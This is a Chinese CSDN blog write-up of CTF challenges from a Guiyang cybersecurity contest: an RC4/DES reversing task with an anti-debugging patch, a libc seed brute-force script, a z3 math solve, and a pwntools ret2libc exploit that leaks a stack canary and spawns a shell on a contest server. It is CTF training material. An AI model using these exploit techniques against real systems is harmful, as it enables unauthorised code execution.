贵阳大数据及网络安全精英对抗赛-解题赛WP

最新推荐文章于 2024-03-21 00:58:14 发布
最新推荐文章于 2024-03-21 00:58:14 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68757308/article/details/130461487
版权

WP


(没写几题,就记录一下,misc写的基本都是佬们打爆的几题,就不写了

REVERSE

(如果有佬出了rust的flag,求佬告诉我一下orz,太菜了,没运行出来,验证不了flag,麻烦佬们告诉下orz)

ezre

观察程序,其中有base64、rc4、DES算法,
函数主要逻辑:输入一串字符,前一位和后一位异或,再rc4加密,最后des加密,DES算法给出了加密解密,0x65为加密,0x64为解密
在这里插入图片描述
根据动调来做,其中要注意的是tls函数对DES的密钥和输入的数据进行了改动
在这里插入图片描述
在这里插入图片描述
手动把两个tls函数判断是否调试的地方改一下,绕过反调试,
可以手动patch,也可以改ZF的值,
patch的话可以将74改成75,即可绕过反调试
在这里插入图片描述
在这里插入图片描述
输入flag{12345678901234567890123456789012}
在这里插入图片描述
调试到异或后,
在这里插入图片描述
取出数组十六进制数据为,

0A 0D 06 1C 4A 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 4F 7D

经过rc4加密后数据为
在这里插入图片描述

3F D8 A0 03 BA 63 83 A7 C6 AC AD B2 D6 25 30 5B 83 88 96 C7 CE B9 22 AC 8D 1F 79 91 7E 73 38 F4 FC 98 CA A9 B7 D4

可用这两个异或,得到xor_key,
将此处的0x65改为0x64,并把最后判断的数组byte_40B078提取出来,
在这里插入图片描述
在des解密前,将byte_40B668的数据改为byte_EBB078的值

11 C3 77 FE 6F D2 EB F1 CF 1E 50 4D 70 4C 25 29 
B5 CA 75 DB 8C 19 82 D9 1F E1 5E 58 EB 4B 51 D2 
75 F4 BA 1F 61 0D 45 BD

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
通过解密后,得到
在这里插入图片描述

3F D8 A0 03 E9 63 D2 F2 97 FD A8 B9 87 7B 36 5F D0 8B 91 C5 99 E2 20 A6 DF 4A 2C 93 27 7E 3A F7 FD CD 97 AB BC D4

最后写个脚本逆推出flag

x1=[0x0A, 0x0D, 0x06, 0x1C, 0x4A, 0x03, 0x01, 0x07, 0x01, 0x03, 
  0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03, 
  0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03, 
  0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x4F, 0x7D]
x2=[0x3F, 0xD8, 0xA0, 0x03, 0xBA, 0x63, 0x83, 0xA7, 0xC6, 0xAC, 
  0xAD, 0xB2, 0xD6, 0x25, 0x30, 0x5B, 0x83, 0x88, 0x96, 0xC7, 
  0xCE, 0xB9, 0x22, 0xAC, 0x8D, 0x1F, 0x79, 0x91, 0x7E, 0x73, 
  0x38, 0xF4, 0xFC, 0x98, 0xCA, 0xA9, 0xB7, 0xD4]
result=[0x3F, 0xD8, 0xA0, 0x03, 0xE9, 0x63, 0xD2, 0xF2, 0x97, 0xFD, 
  0xA8, 0xB9, 0x87, 0x7B, 0x36, 0x5F, 0xD0, 0x8B, 0x91, 0xC5, 
  0x99, 0xE2, 0x20, 0xA6, 0xDF, 0x4A, 0x2C, 0x93, 0x27, 0x7E, 
  0x3A, 0xF7, 0xFD, 0xCD, 0x97, 0xAB, 0xBC, 0xD4]
xor_key=[]

for i in range(len(x1)):
    xor_key.append(x1[i]^x2[i])

for i in range(len(result)):
    result[i]^=xor_key[i]

for i in range(len(result)-2,-1,-1):
    result[i]^=result[i+1]
print(bytes(result))

得到flag{ba1c3aea1faf4067a565f0da97488d89}

rev_randomize2

(赛后在本地复现出的,远程环境关了,不知道远程行不行,如果有误,轻点喷orz,方法比较烂,就硬爆随机数种子,有点废电脑,也有点看运气,随机数种子小的话,就很快)
代码主要逻辑,开始有初始分1000,猜对一个随机数加1分,再猜对一个加2分,依此类推,猜错的话,规律一样,当分数大于2000分,即可得到flag
在这里插入图片描述
sub_1289函数初始化随机数种子
在这里插入图片描述
sub_12FE获取生成的随机数
在这里插入图片描述
然后开跑,这里的libc.so.6是直接用pwn题给的libc,记得在本地建个flag文件,不然跑了半天出了才知道还没有文件(问就是我

from pwn import *
from ctypes import *

context.log_level = "debug"

# p = remote('39.107.71.45', '25568')
p = process('./randomize')
elf = cdll.LoadLibrary('./libc.so.6')

p.recvuntil(b'Now guess!\n')
p.sendline(b'1')
p.recvuntil(b'The number in my mind is ')
a = int(p.recvuntil(b'\n')[:-1])
p.recvuntil(b'Now guess!\n')
p.sendline(b'1')
p.recvuntil(b'The number in my mind is ')
b = int(p.recvuntil(b'\n')[:-1])
p.recvuntil(b'Now guess!\n')
p.sendline(b'1')
p.recvuntil(b'The number in my mind is ')
c = int(p.recvuntil(b'\n')[:-1])
print(a)
print(b)
print(c)

for i in range(0x10000000, 0x100000000):
    elf.srand(i)
    x = elf.rand() >> 15
    y = elf.rand() >> 15
    z = elf.rand() >> 15
    if x == a and y == b and z==c:
        print(hex(i))
        number=i
        break

elf.srand(number)
print(elf.rand() >> 15)
print(elf.rand() >> 15)
print(elf.rand() >> 15)
score=994
for i in range(100):
    payload = str(elf.rand() >> 15)
    p.sendline(payload.encode())
    score+=(i+1)
    if score>=2000:
    	break
    p.recvuntil(b'Now guess!\n')

p.interactive()

在这里插入图片描述

CRYPTO

math

没有时间限制,就直接本地挨个解了,没写交互脚本

import hashlib
import itertools
from string import digits, ascii_letters, punctuation

# alpha_bet=digits+ascii_letters+punctuation
# strlist = itertools.product(alpha_bet, repeat=4)

# sha256="710dd6a2908fed2a9977445f021333d176f39060f3b14c8ebe73ab12d4946461"
# tail="QlRvhN1QqRksWBrG"

# xxxx=''

# for i in strlist:
    # data=i[0]+i[1]+i[2]+i[3]
    # data_sha=hashlib.sha256((data+str(tail)).encode('utf-8')).hexdigest()
    # if(data_sha==str(sha256)):
        # xxxx=data
        # break

# print(xxxx)

# pow(p,9)+pow(q,9): 2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222
# pow(p,3)+pow(q,3): 2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142


from z3 import *
p,q = Ints('p q')
solver = Solver()#创建一个求解器对象
solver.add(pow(p,9)+pow(q,9)==2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222)
solver.add(pow(p,3)+pow(q,3)==2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142)
if solver.check() == sat: #check()方法用来判断是否有解,sat(satisify)表示满足有解
    ans = solver.model() #model()方法得到解
    p1=ans[p].as_long()
    q1=ans[q].as_long()
    print(ans)
    print(p1)
    print(q1)
else:
    print("no ans!")
    
print((p1*q1) % (p1+q1))

在这里插入图片描述

PWN

ezstack

利用栈溢出和canary泄露的漏洞ret2libc
在这里插入图片描述

from pwn import *

context(arch="amd64", os="linux", log_level='debug')

e = ELF("./pwn2")
libc = ELF("libc.so.6")

p = remote('123.56.175.221', '17322')

puts_plt_addr = e.symbols["puts"]
puts_got_addr = e.got["puts"]
main_addr = e.symbols["main"]
rdi_addr = 0x401363
ret = 0x401364

p.sendline(b'a' * (0x30 - 10) + b'b')
p.recvuntil(b'b\n')
canary = u64(p.recv(8))
print(hex(canary))

payload = b'a' * (0x30 - 8) + p64(canary) + p64(0) + p64(rdi_addr) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)
p.sendlineafter(b'input: \n', payload)

puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

base_addr = puts_addr - libc.sym['puts']
system_addr = base_addr + libc.sym['system']
binsh_addr = base_addr + next(libc.search(b'/bin/sh'))
print(hex(system_addr))
print(hex(binsh_addr))

payload2 = b'a' * (0x30 - 8) + p64(canary) + p64(0) + p64(ret) + p64(rdi_addr) + p64(binsh_addr) + p64(system_addr)
p.sendlineafter(b'input: \n', payload2)
p.interactive()

在这里插入图片描述
拿到权限后,得到flag,flag{nEsqteUbHFuy8mQTNXH7abj43C5Q4NQG}

Blu3e
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
广东省2023技能大网络安全项 C模块wp
04-20
通过广东省2023技能大网络安全项B模块的解题思路的锻炼,选手们不仅能够提升自己的网络安全技能水平,还能够培养自己的逻辑思维能力和团队协作精神。这些能力在未来的学习和工作中都将发挥重要作用,为他们在...
广东省2023技能大网络安全项 中职 B模块wp
04-20
广东省2023技能大网络安全项B模块的解题思路,不仅是选手们展示自身网络安全技能的平台,更是对选手们逻辑思维、实践能力和团队协作精神的全面考验。在这个模块中,选手们需要针对特定的网络安全问题,进行深入...
贵阳杯2023ctf web部分wp
m0_63441547的博客
04-29 703
不过这题得先绕过异常函数,异常函数的绕过和绕过wakeup类似,序列化字符串中表示对象属性个数的值大于真实的属性个数时会绕过(弄清楚这点就容易多了)重定向,用burp抓包一直发送,考察php伪协议读取(由于观景关闭无法复现了);tee:以标准输入作为输入,标准输出和文件作为输出。应该是cat命令的问题,换个nl flag.php。ip=127.0.0.1吗?无回显rce这里我用的是tee命令。
2023 贵阳大数据安全精英 --- Crypto childrsa wp
3tefanie丶zhou的博客
05-06 999
【大侠的意义是在天下阴暗处点一盏灯,照亮一小块黑暗,然后就会有人学着,再点亮一盏,如果灯多了,这世界上黑暗的地方就少了。 ----节选自三弦大天使作品《天之下》】
2023闽盾杯线上初Crypto wp
qq_41626232的博客
05-25 751
实际上m<512bits也能格出来,但是最好是已知flag的长度,构造相应的格。然后对于结果矩阵R只知道第0,2,4,6次项。所以我只需要取出变换矩阵p的第0,2,4,6行。其中p为变换矩阵,N为Jordan标准型,不知道的话可以搜一下学一学。后来就变成矩阵的运算了,这块递推还是自己看比较好。就是dsa签名,然后私钥取值太小了,考虑用格解一下就出了。是一个小于512bits,即小于64字节的flag。的第一位,也就是上面矩阵运算结果的第一位。下面我们的问题就转成矩阵运算的形式了。,然后带入到第一个等式中。
强网先锋 ezre
m0_74154467的博客
12-18 444
CTF
VCTF-WP(re)
m0_75243362的博客
03-21 677
​ 1.先查一手壳,64位无壳​ 2.找到主函数一顿分析发现有爆红跟进一下,然后让ida重新分析一手(选中红色部分按p)​ 3.重新分析之后这块儿参数都没了,不知道是不是ida的问题,然后跟进sub_1248函数瞅一眼,应该是base64编码,然后最后码表从s中取​ 4.回头瞅了一眼密文最后有个等号,确定应该就是base64,然后直接用在线平台自定义base64解出来,得到一串看不见的字符,一直怀疑是不是哪儿搞错了,然后怀着怀疑的态度,接着往上逆回去。
记首次参加网络安全比赛(初-知识竞,决-CTF夺旗-解题模式)
hanjingjava的专栏
10-22 8754
持续4个小时,到场时大家还能尽量放松,互相打气,比赛过程中全场死一般寂静,能够感受到几十个大脑的飞速运转,彼此较劲。每当有人解出一道题,系统会提示,这由增加了无形的压力。时间到,系统自动终止答题,所有人都默默的坐着,就像行驶在快车道上的汽车,到达目的地要经过一个长时间的减速。走出比赛场地,到了外面,呼吸到清凉的空气,大家才恢复到“正常”模式,团队里的4人彼此交流起来:你解出几题?那道Web是怎么解的?...
2022年第三届全国大学生网络安全精英
liuruo11000的博客
10-25 6546
为了使大学生更全面的掌握网络安全知识,进一步提升网络安全意识和网络安全技能,深入加强信息化环境下企业信息安全保护能力,使优秀的学生,在竞争中展示自己,并为各个学校展示自身的教学实力提供平台,在中国信息安全测评中心指导下,国家网络空间安全人才培养基地拟于2022年10-12月举办“2022年第三届全国大学生网络安全精英”,使全国广大在校学生在信息意识普及和知识技能提升方面更好地展示自身能力,为其顺利进入工作岗位打下良好的基础。介绍各承办、协办单位,冠名企业领导发言,参选手、指导教师代表发言。
克拉玛依市第一届网络安全技能大-团队WP
t235336456的博客
11-28 3560
此次比赛偏中等难度,高级中学十三年团队共解出6题,不过还是乱杀 排名第二,还是很开心的团队名称:高级中学十三年解题人:xinyi,糖糖Web1. ezbyp@ss 打开容器以后看到a和b是进行md5碰撞还要使得a≠b构造a和b a=QNKCDZO&b=240610708if (isset($_POST['password'])){ if ((($_POST['password'])>9999999)&&((strlen($_POST['password']))
广东省2023技能大网络安全项 中职 D模块wp
最新发布
04-20
通过广东省2023技能大网络安全项B模块的解题思路的锻炼,选手们不仅能够提升自己的网络安全技能水平,还能够培养自己的逻辑思维能力和团队协作精神。这些能力在未来的学习和工作中都将发挥重要作用,为他们在...
天池大数据平台上IJCAI-17口碑商家客流量预测比赛解题思路和代码.zip
01-01
全国大学生电子设计竞(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。 全国大学生电子设计...
2017高职大数据真题及参考答案
11-04
【标题】"2017高职大数据真题及参考答案"揭示了这是一份针对2017年全国高职院校大数据的资料,其中包含了实际的比赛题目和官方提供的参考解答。这样的资源对于参学生或者对大数据技术感兴趣的学习者来说是...
信息安全管理与评估-比赛总结
12-18
比赛重点考核了参者在安全网络组建、网络系统安全策略部署、信息保护以及网络安全运维管理等方面的实践能力。首先,参者需设计信息安全防护方案,绘制详细的设备拓扑图,体现出对安全布局的理解。其次,他们需要...
PwnHub2022冬季-部分真题
12-20
【PwnHub2022冬季-部分真题】是一个针对网络安全爱好者和专业人士的挑战活动,主要聚焦于CTF(Capture The Flag)比赛类型。CTF是一种信息安全,参者通过解决各种技术难题来获取“旗帜”,这些旗帜通常代表...
H卷-2019年计算机网络应用项国样题-修订V1.5.docx
12-13
"H卷-2019年计算机网络应用项国样题-修订V1.5.docx" 本资源摘要信息是根据2019年计算机网络应用项国样题-修订V1.5.docx文件生成的。 知识点一:计算机网络应用竞样题 本竞样题是为高职组计算机网络...
2019华为软件精英挑战-初-任务书-v1.51
08-08
【华为软件精英挑战】是华为举办的一项针对IT专业学生的竞,旨在考验参者在软件设计、算法优化以及问题解决等方面的能力。2019年的初任务书围绕着城市道路交通规划,要求参者设计一个系统,能为模拟道路上...
资料-如何备战美.zip
02-03
标题"美资料-如何备战美.zip"明确指出这是一个关于准备参加"美"(可能是指美国大学生数学建模竞,简称MCM/ICM)的压缩文件,其中包含了备所需的资料。描述与标题相同,再次强调了文件的主题是美的备...
2020网络安全全国试点
12-08
2020年全国职业院校技能大改革试点(中职组)网络安全试题涉及四个模块,分别是基础设施设置与安全加固、网络安全事件响应、数字取证调查和应用安全、CTF夺旗-攻击以及CTF夺旗-防御。竞时间安排和分值权重...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值